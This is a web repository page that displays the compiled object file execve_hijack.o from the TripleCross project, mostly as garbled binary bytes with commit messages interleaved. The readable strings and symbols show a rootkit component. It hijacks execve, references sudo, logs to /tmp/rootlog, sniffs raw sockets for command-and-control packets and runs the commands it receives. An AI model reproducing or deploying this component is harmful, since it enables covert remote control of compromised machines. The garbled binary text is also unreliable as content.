admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-21 17:23:07 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
0c88d5baa9ea947c9e8f58da6ffbd6633e80c7fa
TripleCross/src/helpers/execve_hijack.o

25 lines
6.4 KiB
Plaintext
Raw Normal View History

Added new libc symbols extraction
2022-03-02 19:00:50 -05:00
ELF><00>@@ UH<55><48>H<EFBFBD><48> H<>}<7D><><00><00>H<>E<EFBFBD>H<EFBFBD>}<7D>H<EFBFBD><00>H<>E<EFBFBD>H<EFBFBD>}<7D><0F>$H<><00><00>H<>H<>E<EFBFBD><45>_<00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>U<EFBFBD><55><00>H<><48><0F>H<>}<7D>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>u<EFBFBD>H<EFBFBD><00><00>H<>}<7D><>H<>E<EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD><48> ]<5D>f.<1F>f<>UH<55><48>H<EFBFBD><48> <00><00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><00><><EFBFBD><EFBFBD><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><0F>
<00><00>H<><48><00><><EFBFBD><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><0F>
<00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>@H<><00>8<EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48> ]<5D>@UH<55><48>H<EFBFBD><48>P<00>E<EFBFBD><00>}<7D>H<EFBFBD>u<EFBFBD>H<EFBFBD>U<EFBFBD>H<EFBFBD><00><00><00>E<EFBFBD><00>E<EFBFBD>;E<><0F>.<00>u<EFBFBD>H<EFBFBD>E<EFBFBD>HcM<63>H<EFBFBD><14>H<EFBFBD><00><00><00>E<EFBFBD><45><EFBFBD><01>E<EFBFBD><45><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>}<7D><>H<>}<7D><>H<>E<EFBFBD>H<EFBFBD>}<7D><>H<>E<EFBFBD><45><00><><0F><><00>E<EFBFBD><45><EFBFBD><01><>H<EFBFBD><48>H<EFBFBD>E<EFBFBD>H<EFBFBD><14>H<><48><EFBFBD>H<EFBFBD><48>H)<29>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD>M<EFBFBD>H<EFBFBD>M<EFBFBD>H<EFBFBD> H<><08>E<EFBFBD><00>E<EFBFBD>;E<><0F>.H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>M<EFBFBD>HcU<63>H<EFBFBD>ыM<D18B><4D><EFBFBD>Hc<48>H<EFBFBD>ȋE<C88B><45><EFBFBD><01>E<EFBFBD><45><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>U<EFBFBD>H<EFBFBD><00><00><><0F>H<><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>E<EFBFBD>H<EFBFBD><48>H<EFBFBD><00>B<00><><00><00><00>E<EFBFBD><45>}<7D><0F>H<><00><00>E<EFBFBD>H<>E<EFBFBD>HcM<63><0F><08><><0F>&<00>}<7D>H<EFBFBD>u<EFBFBD>HcE<63>Hƺ<00><00>E<EFBFBD><45><EFBFBD><01>E<EFBFBD><45><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>}<7D>H<EFBFBD><00><00><00>E<EFBFBD>H<>E<EFBFBD>H<EFBFBD>HcM<63><0F><08><><0F>)<00>}<7D>H<EFBFBD>E<EFBFBD>H<EFBFBD>0HcE<63>Hƺ<00><00>E<EFBFBD><45><EFBFBD><01>E<EFBFBD><45><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>}<7D>H<EFBFBD><00><00><00>}<7D>H<EFBFBD><00> <00>H<>}<7D>H<EFBFBD><00>H<>}<7D><0F>#<00>}<7D>H<EFBFBD><00><00><00>E<EFBFBD><45><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>}<7D>H<EFBFBD><00> <00><00>H<><48>x<EFBFBD><78><EFBFBD>H<EFBFBD>u<EFBFBD>H<EFBFBD><48> H<><48>`<60><><EFBFBD><EFBFBD><00><00>H<><48>x<EFBFBD><78><EFBFBD>H<EFBFBD><00><00>H<><48>x<EFBFBD><78><EFBFBD>L<EFBFBD><4C>`<60><><EFBFBD>H<EFBFBD><48>8<EFBFBD><38><EFBFBD><EFBFBD>@<00>(#A<>H<>H<><48>H<>$<24>H<><48> H<><48>X<EFBFBD><58><EFBFBD>H<EFBFBD><48>H<EFBFBD>H <10>8<EFBFBD><38><EFBFBD><10>H<EFBFBD><48><EFBFBD>H<00>H<><48>0<EFBFBD><30><0F>+<00>}<7D>H<EFBFBD><00><00><00>}<7D><><00>E<EFBFBD><45><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Dž4<C785><34><EFBFBD><00><>4<EFBFBD><34><EFBFBD><0F><>4<EFBFBD><34><0F><00><>H<><48><08><><EFBFBD>H<EFBFBD><00>H<><00><00>H<><48><18><><EFBFBD>H<EFBFBD><48><00><><EFBFBD>H<EFBFBD><48><00><><EFBFBD>H<EFBFBD><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>1<EFBFBD><31><EFBFBD>H<EFBFBD><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><0F>YH<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><><0F> H<><00><00>Dž4<C785><34><EFBFBD><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<><48>x<EFBFBD><78><EFBFBD>L<EFBFBD><4C>`<60><><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>@<00>(#A<>H<><48>H<>$<24>H<><48> H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD>H <10><><EFBFBD><EFBFBD><EFBFBD><10><><EFBFBD><EFBFBD><EFBFBD>H<00>H<><48>0<EFBFBD><30><0F>+<00>}<7D>H<EFBFBD><00><00><00>}<7D><><00>E<EFBFBD><45><EFBFBD><EFBFBD><EFBFBD><EFBFBD>1H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><0F><><EFBFBD><EFBFBD>}<7D><><00>E<EFBFBD><00>E<EFBFBD>H<EFBFBD><48>]<5D>rFailed to run command
COMMAND ERRORRESULT OF COMMAND: %s
Hello world from execve hijacker
Argument %i is %s
Corrected issues of opening directories without permission in execve helper
2022-02-24 19:53:11 -05:00
/usr/bin/sudoFailed to execve()/tmp/rootlogFailed to open log file
Added support for integrating the execution hijacker via the rootkit. Still some work to do, also changed some config from fs which needs to be reverted
2022-02-18 09:08:54 -05:00
Sniffing...
Corrected issues of opening directories without permission in execve helper
2022-02-24 19:53:11 -05:00
CC_SYNFailed to open rawsocket
Now the execve hijacker works without needing a canalizer. Removed it. Also some additional tweaks to the c&c launching of the helper
2022-02-19 11:57:32 -05:00
Sniffed
Added support for integrating the execution hijacker via the rootkit. Still some work to do, also changed some config from fs which needs to be reverted
2022-02-18 09:08:54 -05:00
IP: %s
Added new libc symbols extraction
2022-03-02 19:00:50 -05:00
CC_ACKCC_MSG#Received client message
#CC_FINConnection closed by request
Received request: %s
Ubuntu clang version 12.0.0-3ubuntu1~21.04.2zRx <08><00>A<10>C <02> <<00>A<10>C <02> \<00>A<10>C <03> ?<00><><00>!8<00> <00><00>> D<00><00>0<00>_]<00><00><00><00><00><00>V<00><00>n7g<00><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(1<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>FQ<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>W~ <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>+
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>7<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>V
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>y<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>`<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>*<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>3<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>s<00> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'<00>0<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>d!<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>{<00><00>!<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>!<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>!<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&<00>4!<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>I<00>W!<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>\ <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>%!<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ir<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>x <00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>$<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>$<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
&<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>K(<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>4<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>J<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>]
b<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>u<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>!<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>* <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> @<00>`<00>  
  ! strcpy.rela.text.commentexitbuild_standard_packetstrcatfgetsgetLocalIpAddressperrorinet_ntopstrcmprawsocket_sniff_patternmainpopenstrtok.note.GNU-stack.llvm_addrsigprintfexecvewritepcloselocaltimeasctime.rela.eh_framegethostbynamegethostnamefreerawsocket_sendexecute_commandgeteuidcallocexecve_hijack.c.strtab.symtabinet_ntoa.rodata.str1.1O=x @O<00> 
i2<00>a0<00>.<00> <00>p x<00><00>H
<00>L<>o<00> 
W<00> 0
Reference in New Issue Copy Permalink